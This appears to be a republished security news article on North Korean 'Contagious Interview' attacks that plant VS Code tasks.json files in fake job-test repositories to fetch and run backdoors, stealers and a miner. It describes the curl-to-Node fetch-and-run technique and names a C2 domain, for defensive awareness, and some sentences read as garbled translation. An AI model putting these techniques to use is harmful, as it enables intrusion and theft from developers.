North Korean threat actors associated with the long-running Contagion Interview campaign have been observed using malicious Microsoft Visual Studio Code (VS Code) projects as decoys that provide backdoors to compromised endpoints.
According to Jamf Threat Labs, the latest findings demonstrate the continued evolution of new tactics first discovered in December 2025.
“This activity included the deployment of a backdoor implant that provided remote code execution capabilities on victims’ systems,” security researcher Thijs Xhaflaire said in a report shared with The Hacker News.
The attack, first revealed last month by OpenSourceMalware, essentially involves instructing potential targets to clone a repository on GitHub, GitLab, or Bitbucket and launch a project in VS Code as part of a supposed job evaluation.
The ultimate goal of these efforts is to exploit VS Code task configuration files to execute malicious payloads staged on Vercel domains, depending on the operating system on the infected host. This task is configured to run every time that file or any other file in the project folder is opened in VS Code by setting the “runOn:folderOpen” option. This ultimately leads to the deployment of BeaverTail and InvisibleFerret.
Subsequent iterations of the campaign revealed that the malware was hiding a sophisticated multi-stage dropper within the task configuration file by disguising itself as a benign spell-checking dictionary as a fallback mechanism in case the task was unable to retrieve the payload from the Vercel domain.
As before, the obfuscated JavaScript embedded in these files is executed as soon as the victim opens the project in an integrated development environment (IDE). Establish communication with the remote server (‘ip-regions-check.vercel’).[.]app”) and execute the JavaScript code received from it. The final stage provided as part of the attack is another highly obfuscated JavaScript.
Jamf said it discovered yet another change in this campaign. The attackers used a previously undocumented infection method to distribute a backdoor that provided remote code execution capabilities on compromised hosts. The starting point of the attack chain remains the same in that it is activated when a victim uses VS Code to clone and open a malicious Git repository.
“When you open a project, Visual Studio Code asks you to trust the repository creator,” Xhaflaire explained. “Once that trust is granted, the application automatically processes the repository’s tasks.json configuration file, which could result in arbitrary embedded commands being executed on the system.”
“On macOS systems, this runs a background shell command that uses nohup bash -c in conjunction with curl -s to remotely retrieve the JavaScript payload and pipe it directly to the Node.js runtime. This allows execution to continue independently, suppressing all command output, even when the Visual Studio Code process terminates.”
The Vercel-hosted JavaScript payload contains the main backdoor logic to gather basic host information and communicate with the remote server to establish a persistent execution loop that facilitates remote code execution, system fingerprinting, and ongoing communication.
In one case, the Apple device management company said it observed more JavaScript instructions being executed about eight minutes after the initial infection. The newly downloaded JavaScript is designed to send a beacon to the server every 5 seconds, execute additional JavaScript, and erase traces of activity upon receiving a signal from the operator. It is suspected that the script may have been generated using artificial intelligence (AI) tools due to the presence of inline comments and phrases in the source code.
Threat actors associated with the Democratic People’s Republic of Korea (DPRK) are known to specifically target software engineers, particularly those working in the cryptocurrency, blockchain, and fintech fields. This is because software engineers often have privileged access to financial assets, digital wallets, and technological infrastructure.
Compromising an account or system can allow an attacker to gain unauthorized access to source code, intellectual property, internal systems, and siphon digital assets. These consistent changes to their tactics are seen as an effort to achieve greater success in cyber espionage and financial goals in support of heavily sanctioned regimes.
The development comes as Red Asgard details an investigation into a malicious repository called Tsunami (also known as TsunamiKit) that was found to be using VS Code task configurations to obtain obfuscated JavaScript designed to drop a full-featured backdoor and XMRig cryptocurrency miner.
Separate analysis released last week by the Security Alliance revealed the campaign’s abuse of VS Code tasks in attacks that approached unspecified victims on LinkedIn. The attacker claimed to be the chief technology officer of a project called Meta2140 and shared the concept.[.]Therefore, the link includes a technical assessment and a URL to the Bitbucket repository hosting the malicious code.
Interestingly, this attack chain is designed to fallback to two other methods. It installs a malicious npm dependency named ‘grayavatar’ or runs JavaScript code that obtains an advanced Node.js controller. This controller runs five different modules to record keystrokes, take screenshots, scan the system’s home directory for sensitive files, replace wallet addresses copied to the clipboard, credentials from the web browser, and establish a persistent connection to a remote server.
The malware then begins setting up a parallel Python environment with a stager script that enables data collection, cryptocurrency mining using XMRig, keylogging, and deployment of AnyDesk for remote access. Notice that the Node.js and Python layers are called BeaverTail and InvisibleFerret, respectively.
These findings indicate that state-sponsored attackers are experimenting with multiple delivery methods in parallel to increase the likelihood of a successful attack.
“This activity highlights the continued evolution of threat actors associated with North Korea, who are consistently adapting their tools and delivery mechanisms to integrate with legitimate developer workflows,” Jamf said. “The exploitation of Visual Studio Code task configuration files and Node.js execution shows that these technologies continue to evolve along with commonly used development tools.”
Source link
